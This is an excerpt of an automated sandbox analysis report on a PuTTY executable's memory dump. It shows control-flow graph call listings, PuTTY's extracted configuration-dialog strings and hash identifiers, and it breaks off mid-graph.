7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678612890 call 7ff6786251e0 call 7ff678613590 call 7ff678606f20 195->197 196->197 198 7ff67861c840-7ff67861c84d call 7ff678606f20 196->198 446 7ff67861d53a-7ff67861d624 call 7ff678625360 call 7ff678625680 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678625680 197->446 447 7ff67861d523-7ff67861d52a 197->447 198->195 198->197 450 7ff67861d629-7ff67861e374 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678612890 call 7ff6786251e0 call 7ff678613590 call 7ff678625360 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e40 call 7ff678626130 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678612890 call 7ff6786251e0 call 7ff678613590 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 * 2 call 7ff678625900 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678612890 call 7ff678625360 call 7ff678613590 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff6786251e0 call 7ff678625360 call 7ff6786255e0 call 7ff678624e50 call 7ff678625d10 call 7ff6786134f0 call 7ff678625680 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 call 7ff678625c30 call 7ff678625680 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678612890 call 7ff678625360 call 7ff678613590 call 7ff6786262b0 call 7ff678625680 call 7ff6786255e0 call 7ff678624e50 call 7ff678625d10 call 7ff6786262b0 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 call 7ff678625c30 call 7ff678625680 446->450 447->446 448 7ff67861d52c-7ff67861d534 447->448 448->446 448->450 729 7ff67861e9a7-7ff67861e9b9 450->729 730 7ff67861e37a-7ff67861e40d call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 450->730 731 7ff67861edaa-7ff67861edc2 call 7ff678606f20 729->731 732 7ff67861e9bf-7ff67861eda5 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678625e10 call 7ff678625680 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678625680 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 * 4 call 7ff678625a00 729->732 730->731 777 7ff67861e413-7ff67861e672 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678606f20 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff67864a3e0 730->777 742 7ff67861edc9-7ff67861ede1 call 7ff678606f20 731->742 743 7ff67861edc4-7ff67861edc7 731->743 732->731 752 7ff67861ede7-7ff67861edea 742->752 753 7ff67862067f-7ff678620697 call 7ff678606f20 742->753 743->742 744 7ff67861edf0-7ff67861ee09 call 7ff6786251e0 743->744 758 7ff67861ee0b-7ff67861ee15 744->758 759 7ff67861ee62-7ff67861eee5 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678625360 744->759 752->744 752->753 773 7ff6786208bd-7ff6786208d5 call 7ff678606f20 753->773 774 7ff67862069d-7ff6786206a0 753->774 764 7ff67861ee17-7ff67861ee1a 758->764 765 7ff67861ee20-7ff67861ee4e call 7ff678625360 call 7ff6786262b0 758->765 844 7ff67861eeea-7ff67861ef1a call 7ff678624e40 call 7ff678626360 759->844 764->765 770 7ff67861ef21-7ff67861ef71 call 7ff678625360 call 7ff678624e40 call 7ff678626360 764->770 804 7ff67861f343-7ff67861f397 call 7ff678625360 call 7ff678624e40 call 7ff678625c30 765->804 805 7ff67861ee54-7ff67861ee57 765->805 828 7ff67861ef77-7ff67861f0d6 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff6786262b0 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e40 * 3 call 7ff678625a00 770->828 829 7ff67861f0db-7ff67861f0de 770->829 794 7ff678620a87-7ff678620a94 call 7ff678606f20 773->794 795 7ff6786208db-7ff6786208de 773->795 774->773 781 7ff6786206a6-7ff6786206cc call 7ff678606f20 call 7ff6786251e0 774->781 1182 7ff67861e677-7ff67861e9a5 call 7ff678612890 call 7ff678613590 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678613590 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678625360 call 7ff678625680 call 7ff6786255e0 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 call 7ff678625c30 call 7ff678624e50 call 7ff678625c30 call 7ff678625680 call 7ff678624e50 call 7ff678625d10 call 7ff6786134f0 777->1182 817 7ff67862073a-7ff6786208b8 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 781->817 818 7ff6786206ce-7ff678620735 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 781->818 821 7ff678620a9a-7ff678620a9d 794->821 822 7ff678620b24-7ff678620b31 call 7ff678606f20 794->822 795->794 803 7ff6786208e4-7ff67862091c call 7ff6786251e0 call 7ff678625360 795->803 849 7ff678620a2d-7ff678620a82 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 803->849 850 7ff678620922-7ff678620a28 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678624e40 * 3 call 7ff678625a00 803->850 879 7ff67861fe5a-7ff678620258 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678625680 call 7ff6786262b0 call 7ff6786255e0 call 7ff678624e50 call 7ff678625c30 call 7ff678624e50 call 7ff678625d10 call 7ff6786134f0 call 7ff678626210 call 7ff6786262b0 call 7ff678624e50 call 7ff678625c30 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 * 4 call 7ff678625a00 call 7ff678624e40 * 3 call 7ff678624e50 call 7ff678625a00 call 7ff678626210 call 7ff678625680 804->879 880 7ff67861f39d-7ff67861f3a0 804->880 805->804 814 7ff67861ee5d 805->814 814->770 817->773 818->817 821->822 833 7ff678620aa3-7ff678620b1f call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 821->833 857 7ff678620b37-7ff678620b3a 822->857 858 7ff678620cb6-7ff678620cd1 822->858 828->829 837 7ff67861f33e-7ff67861f341 829->837 838 7ff67861f0e4-7ff67861f0e7 829->838 833->822 837->804 851 7ff67861f3ab-7ff67861f576 call 7ff678625360 call 7ff678625680 call 7ff6786262b0 call 7ff6786255e0 call 7ff678624e50 call 7ff678625c30 call 7ff678624e50 call 7ff678625d10 call 7ff678626210 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 call 7ff678625c30 call 7ff678625680 call 7ff678625360 call 7ff678624e40 call 7ff678625c30 837->851 838->837 852 7ff67861f0ed-7ff67861f339 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678625f20 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff6786262b0 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678625f20 call 7ff678624e40 call 7ff678626360 838->852 844->770 849->794 850->849 907 7ff67861f57b-7ff67861f617 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678625f20 call 7ff678624e40 call 7ff678626360 851->907 852->837 857->858 868 7ff678620b40-7ff678620cb1 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 857->868 868->858 879->753 1327 7ff67862025e-7ff67862067a call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678625360 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 879->1327 880->879 893 7ff67861f3a6 880->893 893->907 907->879 1047 7ff67861f61d-7ff67861f9e9 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626020 call 7ff678624e40 call 7ff678626020 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 907->1047 1384 7ff67861f9eb-7ff67861fa60 call 7ff678624e50 call 7ff678625f20 call 7ff678624e40 call 7ff678626020 1047->1384 1385 7ff67861fa65-7ff67861fe55 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff6786255e0 call 7ff6786262b0 call 7ff678624e50 call 7ff678625d10 call 7ff6786134f0 call 7ff678625680 call 7ff6786262b0 call 7ff678624e50 call 7ff678625c30 call 7ff678625680 * 2 call 7ff678624e50 * 4 call 7ff678625a00 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678626210 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 * 3 call 7ff678625a00 1047->1385 1182->732 1327->753 1384->1385 1385->879
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID: (Log file name can contain &Y, &M, &D for date, &T for time, &H for host name, and &P for port number)$(Use 1M for 1 megabyte, 1G for 1 gigabyte etc)$**MORE** processing$... in this many seconds$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/config.c$1 (INSECURE)$6$Action to happen when a bell occurs:$Active$Add$Add key$Add new forwarded port:$Adjust how %s handles line drawing characters$Adjust the behaviour of the window title$Adjust the precise colours %s displays$Adjust the use of the cursor$Adjust the use of the mouse pointer$Adjust the window border$Algorithm selection policy:$All session output$Allow GSSAPI credential delegation$Allow agent forwarding$Allow attempted changes of username in SSH-2$Allow terminal to specify ANSI colours$Allow terminal to use 24-bit colours$Allow terminal to use xterm 256-colour mode$Always$Always append to the end of it$Always overwrite it$Answerback to ^E:$Application$Application keypad settings:$Apply$Ask the user every time$Assign copy/paste actions to clipboards$Attempt "keyboard-interactive" auth (SSH-2)$Attempt GSSAPI authentication (SSH-2 only)$Attempt GSSAPI key exchange$Attempt GSSAPI key exchange (SSH-2 only)$Attempt TIS or CryptoCard auth (SSH-1)$Attempt authentication using Pageant$Authentication methods$Auto$Auto wrap mode initially on$Auto-copy selected text to system clipboard$Auto-login username$BSD (commonplace)$Basic options for your %s session$Bell is temporarily disabled when over-used$Block$Blue$Both$Bypass authentication entirely (SSH-2 only)$Cancel$Certificate to use with the private key (optional):$Change the sequences sent by:$Character classes:$Character set translation$Chokes on PuTTY's SSH-2 'winadj' requests$Chokes on PuTTY's full KEXINIT$Chokes on SSH-1 RSA authentication$Chokes on SSH-1 ignore messages$Chokes on SSH-2 ignore messages$Classes of character that group together$Close window on exit:$Columns$Command to send to proxy (for some types)$Configure host CAs$Configure the appearance of %s's window$Configure the behaviour of %s's window$Configure the serial line$Configure trusted certification authorities$Connection$Connection type:$Connection/Data$Connection/Proxy$Connection/Rlogin$Connection/SSH$Connection/SSH/Auth$Connection/SSH/Auth/Credentials$Connection/SSH/Auth/GSSAPI$Connection/SSH/Bugs$Connection/SSH/Cipher$Connection/SSH/Host keys$Connection/SSH/Kex$Connection/SSH/More bugs$Connection/SSH/TTY$Connection/SSH/Tunnels$Connection/SSH/X11$Connection/SUPDUP$Connection/Serial$Connection/Telnet$Consider proxying local host connections$Control pasting of text from clipboard to terminal$Control the bell overload behaviour$Control the scrollback in the window$Control use of mouse$Control-? (127)$Control-H$Copy and paste line drawing characters as lqqqk$Credentials to authenticate with$Ctrl + Shift + {C,V}:$Ctrl toggles app mode$Cursor appearance:$Cursor blinks$DEC Origin Mode initially on$Data bits$Data to send to the server$Default selection mode (Alt+drag does the other one):$Delete$Destination$Detection of known bugs in SSH servers$Disable Arabic text shaping$Disable Nagle's algorithm (TCP_NODELAY option)$Disable application cursor keys mode$Disable application keypad mode$Disable bidirectional text display$Disable destructive backspace on server sending ^?$Disable remote-controlled character set configuration$Disable remote-controlled clearing of scrollback$Disable remote-controlled terminal resizing$Disable remote-controlled window title changing$Disable switching to alternate terminal screen$Disable xterm-style mouse reporting$Discards data sent before its greeting$Disconnect if authentication succeeds trivially$Display pre-authentication banner (SSH-2 only)$Display scrollbar$Do DNS name lookup at proxy end:$Don't allocate a pseudo-terminal$Don't start a shell or command at all$Downstream (connecting to the upstream PuTTY)$Dynamic$Dynamic Library Files (*.dll)$ESC[n~$Empty string$Enable TCP keepalives (SO_KEEPALIVE option)$Enable VT100 line drawing even in UTF-8 mode$Enable X11 forwarding$Enable blinking text$Enable compression$Enable legacy use of single-DES in SSH-2$Enabling and disabling advanced terminal features$Encryption cipher selection policy:$Encryption options$Environment variables$Exclude Hosts/IPs$Extended ASCII Character set:$Flow control$Flush log file frequently$Font settings$Font used in the terminal window$For selected mode, send:$Force off$Force on$Forwarded ports:$Further workarounds for SSH server bugs$Gap between text and window edge:$General options for colour usage$Green$Handles SSH-2 key re-exchange badly$Handling of OLD_ENVIRON ambiguity:$Handling of line drawing characters:$Hide mouse pointer when typing in window$Host Name (or IP address)$Host key algorithm preference$Host keys or fingerprints to accept:$IPv4$IPv6$Ignores SSH-2 maximum packet size$Implicit CR in every LF$Implicit LF in every CR$Include header$Indicate bolded text by changing:$Initial state of cursor keys:$Initial state of numeric keypad:$Internet protocol version$Key$Key exchange algorithm options$Keyboard sends Telnet special commands$Line discipline options$Lines of scrollback$Linux$Load$Load, save or delete a stored session$Local$Local echo:$Local line editing:$Local ports accept connections from other hosts$Local username:$Location string$Log file name:$Logical name of remote host$Logical name of remote host (e.g. for SSH key lookup):$Logical name of remote host:$Login details$Low-level TCP connection options$MIT-Magic-Cookie-1$Make default system alert sound$Manually configure host keys for this connection$Manually enabled workarounds$Max data before rekey (0 for no limit)$Max minutes before rekey (0 for no limit)$Minutes between GSS checks (0 for never)$Miscomputes SSH-2 HMAC keys$Miscomputes SSH-2 encryption keys$Misuses the session ID in SSH-2 PK auth$Modify$Mouse paste action:$NetHack$Never$None$None (bell disabled)$Normal$Nothing$Nothing on this panel may be reconfigured in mid-session; it is only here so that sub-panels of it can exist without looking strange.$Old RSA/SHA2 cert algorithm naming$Omit known password fields$Omit session data$Only on clean exit$Only supports pre-RFC4419 SSH-2 DH GEX$Only until session starts$Open$Options controlling %s's window$Options controlling GSSAPI authentication$Options controlling Rlogin connections$Options controlling SSH X11 forwarding$Options controlling SSH authentication$Options controlling SSH connections$Options controlling SSH encryption$Options controlling SSH host keys$Options controlling SSH key exchange$Options controlling SSH port forwarding$Options controlling SUPDUP connections$Options controlling Telnet connections$Options controlling character set translation$Options controlling copy and paste$Options controlling copying from terminal to clipboard$Options controlling key re-exchange$Options controlling local serial lines$Options controlling proxy usage$Options controlling session logging$Options controlling the connection$Options controlling the effects of keys$Options controlling the terminal bell$Options controlling the terminal emulation$Options controlling use of colours$Options specific to SSH packet logging$Other authentication-related options$Other:$Over-use means this many bells...$Parity$Passive$Password$Permit control characters in pasted text$Permitted roles in a shared connection:$Plugin command to run$Plugin to provide authentication responses$Poor man's line drawing (+, - and |)$Port$Port forwarding$Prefer algorithms for which a host key is known$Preference order for GSSAPI libraries:$Print proxy diagnostics in the terminal window$Printable output$Printer to send ANSI printer output to:$Private key file for authentication:$Prompt$Protocol options$Proxy hostname$Proxy type:$PuTTY Private Key Files (*.ppk)$Public-key authentication$Push erased text into scrollback$RFC 1408 (unusual)$RGB value:$Rectangular block$Red$Refuses all SSH-1 password camouflage$Remote$Remote X11 authentication protocol$Remote character set:$Remote command:$Remote ports do the same (SSH-2 only)$Remote terminal settings$Remote-controlled printing$Remove$Replies to requests on closed channels$Requires padding on SSH-2 RSA signatures$Reset scrollback on display activity$Reset scrollback on keypress$Response to remote title query (SECURITY):$Return key sends Telnet New Line instead of ^M$Rows$SCO$SSH packets$SSH packets and raw data$SSH protocol version:$Save$Save the current session settings$Saved Sessions$Seconds between keepalives (0 to turn off)$Seconds of silence required$Select a colour from the list, and then click the Modify button to change its appearance.$Select a colour to adjust:$Select a serial line$Select certificate file$Select library file$Select private key file$Select session log file name$Sending of null packets to keep session active$Separate window and icon titles$Serial line to connect to$Session$Session logging:$Session/Logging$Set$Set the size of the window$Set the style of bell$Set to class$Set various terminal options$Share SSH connections if possible$Sharing an SSH connection between PuTTY tools$Shift overrides application's use of mouse$Shift/Ctrl/Alt with the arrow keys$Source port$Specify the destination you want to connect to$Speed (baud)$Standard$Stop bits$Telnet negotiation mode:$Telnet protocol adjustments$Terminal$Terminal details$Terminal modes$Terminal modes to send:$Terminal scrolling$Terminal speeds$Terminal-type string$Terminal/Bell$Terminal/Features$Terminal/Keyboard$The Backspace key$The Function keys and keypad$The Home and End keys$The bell is re-enabled after a few seconds of silence.$The colour$The font$This:$Treat CJK ambiguous characters as wide$Underline$Upstream (connecting to the real server)$Use Unicode line drawing code points$Use background colour to erase screen$Use system username (%s)$User-supplied GSSAPI library path:$Username$VT100+$VT400$Value$Variable$Vertical line$Visual bell (flash window)$WAITS$Warn before closing window$What to do if the log file already exists:$When username is not specified:$Window$Window title$Window title:$Window/Appearance$Window/Behaviour$Window/Colours$Window/Selection$Window/Selection/Copy$Window/Translation$Workarounds for SSH server bugs$X display location$XDM-Authorization-1$Xterm 216+$Xterm R6$Yes$adjust$aux$b$backends[c->radio.nbuttons]$backends[i]$basics$c->radio.nbuttons == 0$charclass$config-address-family$config-ansicolour$config-answerback$config-appcursor$config-appkeypad$config-autowrap$config-backspace$config-bellovl$config-bellstyle$config-blink$config-boldcolour$config-charclasses$config-charset$config-cjk-ambig-wide$config-closeonexit$config-colourcfg$config-command$config-crlf$config-cursor$config-decom$config-environ$config-erase$config-erasetoscrollback$config-features-altscreen$config-features-application$config-features-bidi$config-features-charset$config-features-clearscroll$config-features-dbackspace$config-features-mouse$config-features-qtitle$config-features-resize$config-features-retitle$config-features-shaping$config-font$config-funkeys$config-homeend$config-hostname$config-keepalive$config-lfcr$config-linedraw$config-linedrawpaste$config-localecho$config-localedit$config-logfileexists$config-logfilename$config-logflush$config-logging$config-logheader$config-loghost$config-logssh$config-mouseptr$config-mouseshift$config-nodelay$config-oldenviron$config-paste-ctrl-char$config-printing$config-proxy$config-proxy-auth$config-proxy-command$config-proxy-dns$config-proxy-exclude$config-proxy-logging$config-proxy-type$config-ptelnet$config-rectselect$config-rlogin-localuser$config-saving$config-scrollback$config-selection-autocopy$config-selection-clipactions$config-serial-databits$config-serial-flow$config-serial-line$config-serial-parity$config-serial-speed$config-serial-stopbits$config-sharrow$config-ssh-agentfwd$config-ssh-auth-gssapi$config-ssh-auth-gssapi-delegation$config-ssh-auth-gssapi-libraries$config-ssh-authplugin$config-ssh-banner$config-ssh-bug-chanreq$config-ssh-bug-derivekey2$config-ssh-bug-dropstart$config-ssh-bug-filter-kexinit$config-ssh-bug-hmac2$config-ssh-bug-ignore1$config-ssh-bug-ignore2$config-ssh-bug-maxpkt2$config-ssh-bug-oldgex2$config-ssh-bug-pksessid2$config-ssh-bug-plainpw1$config-ssh-bug-rekey$config-ssh-bug-rsa-sha2-cert-userauth$config-ssh-bug-rsa1$config-ssh-bug-sig$config-ssh-bug-winadj$config-ssh-cert$config-ssh-changeuser$config-ssh-comp$config-ssh-encryption$config-ssh-hostkey-order$config-ssh-kex-cert$config-ssh-kex-manual-hostkeys$config-ssh-kex-order$config-ssh-kex-rekey$config-ssh-ki$config-ssh-noauth$config-ssh-noshell$config-ssh-notrivialauth$config-ssh-portfwd$config-ssh-portfwd-address-family$config-ssh-portfwd-localhost$config-ssh-prefer-known-hostkeys$config-ssh-privkey$config-ssh-prot$config-ssh-pty$config-ssh-sharing$config-ssh-tis$config-ssh-tryagent$config-ssh-x11$config-ssh-x11auth$config-tcp-keepalives$config-telnetkey$config-telnetnl$config-termspeed$config-termtype$config-title$config-truecolour$config-ttymodes$config-username$config-username-from-env$config-utf8linedraw$config-warnonclose$config-winborder$config-winsize$config-xtermcolour$data$disclaimer$f$general$hostport$identity$ipversion$ldisc$main$manual$mappings$n_ui_backends > 0 && n_ui_backends < PROTOCOL_LIMIT$otheropts$overload$plugin$protocol$publickey$r$repeat$rxvt$s$savedsessions$sercfg$serline$sshtty$supdup-ascii$supdup-location$supdup-more$supdup-scroll$tcp$term$trans$tweaks$xterm-style bitmap${Ctrl,Shift} + Ins:
                      • API String ID: 2645101109-754834895
                      • Opcode ID: 7d3f9ddb586df674f39f5c5db71c8caec48e86601bfd0c2f072999babbcf95e4
                      • Instruction ID: 030769ad11cc9de58d6f547cf191ece04dca4c300d8ed834c9e862399f411b36
                      • Opcode Fuzzy Hash: 7d3f9ddb586df674f39f5c5db71c8caec48e86601bfd0c2f072999babbcf95e4
                      • Instruction Fuzzy Hash: 99939432A28B42A5EB10DB21F8412BB7B95FB44784F700135EA8D8779ADF3CD905E758
                      Function 00007FF67860AEF4 Relevance: 107.6, Strings: 85, Instructions: 1304COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1627 7ff67860aef4-7ff67860af1b call 7ff678611a90 call 7ff67860ccf0 1633 7ff67860af1d-7ff67860af2f call 7ff67864a5a0 1627->1633 1634 7ff67860af40-7ff67860afd1 call 7ff678611d70 call 7ff678613590 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67860cd50 1627->1634 1633->1634 1639 7ff67860af31-7ff67860af3d call 7ff67861a3a0 1633->1639 1658 7ff67860afe2-7ff67860b06c call 7ff678612190 call 7ff678626740 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 1634->1658 1659 7ff67860afd3-7ff67860afdf call 7ff67864a530 1634->1659 1639->1634 1680 7ff67860b086-7ff67860b0a7 call 7ff678611a90 call 7ff67864a5d0 1658->1680 1681 7ff67860b06e-7ff67860b083 call 7ff67860cd00 1658->1681 1659->1658 1688 7ff67860b0a9-7ff67860b0be call 7ff67860cd00 1680->1688 1689 7ff67860b0c1-7ff67860b0e2 call 7ff678611a90 call 7ff67864a5d0 1680->1689 1681->1680 1688->1689 1696 7ff67860b0fc-7ff67860b11d call 7ff678611a90 call 7ff67864a5d0 1689->1696 1697 7ff67860b0e4-7ff67860b0f9 call 7ff67860cd00 1689->1697 1704 7ff67860b137-7ff67860b158 call 7ff678611a90 call 7ff67864a5d0 1696->1704 1705 7ff67860b11f-7ff67860b134 call 7ff67860cd00 1696->1705 1697->1696 1712 7ff67860b15a-7ff67860b16f call 7ff67860cd00 1704->1712 1713 7ff67860b172-7ff67860b1d2 call 7ff678611a90 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 1704->1713 1705->1704 1712->1713 1724 7ff67860b1fd-7ff67860b226 call 7ff6785d1000 call 7ff67860ccf0 1713->1724 1729 7ff67860b228-7ff67860b236 call 7ff67864a5a0 1724->1729 1730 7ff67860b250-7ff67860b274 call 7ff6785d6e80 1724->1730 1729->1730 1735 7ff67860b238-7ff67860b23b call 7ff67861a3a0 1729->1735 1736 7ff67860b27a-7ff67860b2bb call 7ff678611c70 * 3 1730->1736 1737 7ff67860b1e0-7ff67860b1f7 call 7ff678613590 1730->1737 1741 7ff67860b240-7ff67860b24d 1735->1741 1736->1737 1737->1724 1744 7ff67860b2c0-7ff67860b2d6 call 7ff67864a5d0 1737->1744 1741->1730 1751 7ff67860b2d8-7ff67860b2ed call 7ff67860cd00 1744->1751 1752 7ff67860b2f0-7ff67860b311 call 7ff678611a90 call 7ff67864a5d0 1744->1752 1751->1752 1759 7ff67860b32b-7ff67860b34c call 7ff678611a90 call 7ff67864a5d0 1752->1759 1760 7ff67860b313-7ff67860b328 call 7ff67860cd00 1752->1760 1767 7ff67860b366-7ff67860b3b6 call 7ff678611a90 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 1759->1767 1768 7ff67860b34e-7ff67860b363 call 7ff67860cd00 1759->1768 1760->1759 1781 7ff67860b3b8-7ff67860b3cd call 7ff67860cd00 1767->1781 1782 7ff67860b3d0-7ff67860b3f1 call 7ff678611a90 call 7ff67864a5d0 1767->1782 1768->1767 1781->1782 1789 7ff67860b40b-7ff67860b42c call 7ff678611a90 call 7ff67864a5d0 1782->1789 1790 7ff67860b3f3-7ff67860b408 call 7ff67860cd00 1782->1790 1797 7ff67860b446-7ff67860b46d call 7ff678611a90 1789->1797 1798 7ff67860b42e-7ff67860b443 call 7ff67860cd00 1789->1798 1790->1789 1803 7ff67860b470-7ff67860b493 call 7ff6785d1000 call 7ff67860ccf0 1797->1803 1798->1797 1808 7ff67860b4c0-7ff67860b4c9 1803->1808 1809 7ff67860b495-7ff67860b4a3 call 7ff67864a5a0 1803->1809 1810 7ff67860b4d4-7ff67860b4db 1808->1810 1809->1808 1815 7ff67860b4a5-7ff67860b4bf call 7ff67861a3a0 1809->1815 1813 7ff67860b4ea-7ff67860b50a call 7ff67869cb74 call 7ff678611c70 1810->1813 1814 7ff67860b4dd-7ff67860b4df 1810->1814 1813->1810 1824 7ff67860b50c-7ff67860b52a call 7ff678613590 1813->1824 1816 7ff67860b4d0 1814->1816 1817 7ff67860b4e1-7ff67860b4e6 1814->1817 1815->1808 1816->1810 1817->1813 1824->1803 1827 